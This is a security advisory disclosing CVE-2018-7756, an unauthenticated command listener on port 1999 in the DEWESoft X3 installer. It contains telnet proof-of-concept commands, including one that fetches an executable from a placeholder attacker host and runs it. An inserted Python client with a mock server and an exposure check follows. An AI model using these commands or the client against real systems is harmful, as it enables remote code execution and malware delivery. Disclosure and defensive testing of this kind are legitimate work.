[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt
[+] ISR: Apparition Security

Vendor:
=============
www.dewesoft.com

Product:
===========
DEWESoft X3 SP1 (64-bit) installer - X3
DEWESoft_FULL_X3_SP1_64BIT.exe

Vulnerability Type:
===================
Remote Internal Command Access

CVE Reference:
==============
CVE-2018-7756

Security Issue:
================
The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the "RunExeFile.exe" component, does not require authentication
for sessions on TCP port 1999, which allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a
RUN command that can launch an .EXE file located at an arbitrary directory location, download an .EXE from an external URL, or run
a "SETFIREWALL Off" command.

The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common Files\DEWESoft Shared\" after installing using the full install.

Internal commands used by "RunExeFile.exe", for which I could not find any documentation:

RUN <ANY EXE>
RUNEX <ANY EXE>
GETFIREWALL
SETFIREWALL Off
KILL <PROCESS>
USERNAME
SHUTDOWN
SENDKEYS
LIST
DWPIPE

Exploit/POC:
=============
TELNET x.x.x.x 1999
RUN calc.exe

OR

Launch the victim's browser and send them to a website for a drive-by download, etc.:

TELNET x.x.x.x 1999
RUN http://ATTACKER-IP/DOOM.exe

Then, from the TELNET session, execute it from the Downloads directory:

runexe c:\Users\victim\Downloads\DOOM.exe

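The same exchange as a small Python client, added here as an example; it is not part of the original advisory or of DEWESoft's software. It assumes the launcher speaks a line-oriented, CRLF-terminated text protocol with no login step (the advisory drives it from TELNET and documents no reply format), so the listener it talks to is a constructed mock on an ephemeral port that records each command and answers a fixed "OK". GETFIREWALL as a harmless exposure probe, and the RUNEX spelling for the final step (the PoC above writes it "runexe", the command list above writes RUNEX), are likewise assumptions. launcher_exposed() is the check a defender would run against port 1999 on their own hosts before anyone reaches for RUN.

```python
import socket
import threading


class MockLauncher:
    """Constructed stand-in for the unauthenticated RunExeFile.exe listener.

    It records every command line it receives and answers a fixed "OK". The
    real service's reply format is undocumented, so the acknowledgement is an
    assumption made for demonstration only. Note what is missing: there is no
    login or token check anywhere before a command is accepted."""

    def __init__(self, host="127.0.0.1"):
        self.received = []
        self._srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._srv.bind((host, 0))          # ephemeral port instead of the real 1999
        self._srv.listen(5)
        self.host, self.port = self._srv.getsockname()
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while True:
            try:
                conn, _ = self._srv.accept()
            except OSError:                # listening socket shut down by close()
                return
            with conn:
                buf = b""
                while not buf.endswith(b"\r\n"):
                    chunk = conn.recv(1024)
                    if not chunk:
                        break
                    buf += chunk
                if buf:
                    self.received.append(buf.decode("ascii", "replace").rstrip("\r\n"))
                    conn.sendall(b"OK\r\n")   # assumed acknowledgement

    def close(self):
        try:
            self._srv.shutdown(socket.SHUT_RDWR)   # wakes the blocked accept()
        except OSError:
            pass
        self._srv.close()


def send_launcher_command(host, port, command, timeout=5.0):
    """Open one session to the launcher and send a single command line.

    Assumes a TELNET-style protocol: one ASCII line, CRLF terminated, no
    authentication. Returns whatever the peer sends back before it closes
    the connection or goes quiet for `timeout` seconds."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(command.encode("ascii") + b"\r\n")
        reply = b""
        try:
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                reply += chunk
        except socket.timeout:
            pass
    return reply.decode("ascii", "replace").strip()


def launcher_exposed(host, port=1999, timeout=3.0):
    """Defender-side check: does this host accept a session on the launcher
    port and answer a read-only command without any authentication?

    GETFIREWALL (from the advisory's command list) is used as the probe on the
    assumption that it only reports state; a refused connection or silence is
    treated as not exposed."""
    try:
        return send_launcher_command(host, port, "GETFIREWALL", timeout) != ""
    except OSError:
        return False


def demo():
    """Run the exposure check and the advisory's PoC sequence against the mock.
    Returns (exposed, replies, commands the mock saw) for inspection."""
    srv = MockLauncher()
    try:
        exposed = launcher_exposed(srv.host, srv.port)
        replies = [send_launcher_command(srv.host, srv.port, cmd)
                   for cmd in ("RUN calc.exe",
                               "RUN http://ATTACKER-IP/DOOM.exe",
                               "RUNEX c:\\Users\\victim\\Downloads\\DOOM.exe")]
    finally:
        srv.close()
    return exposed, replies, list(srv.received)


if __name__ == "__main__":
    print(demo())
```

Against a real host only the two client functions apply (point send_launcher_command at the target and port 1999); the mock exists so the exchange can be run and checked offline.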
Network Access:
===============
Remote

Severity:
=========
High

Disclosure Timeline:
=============================
Vendor Notification: February 9, 2018
Vendor "thank you for the warning. We will forward this to the developers and they will look into it" : February 19, 2018
Inform vendor of disclosure timeline : February 19, 2018
No further replies, updates or addressing of the issue by vendor.
Vendor "We will assume that this issue is resolved and close the ticket." : March 6, 2018
March 10, 2018 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).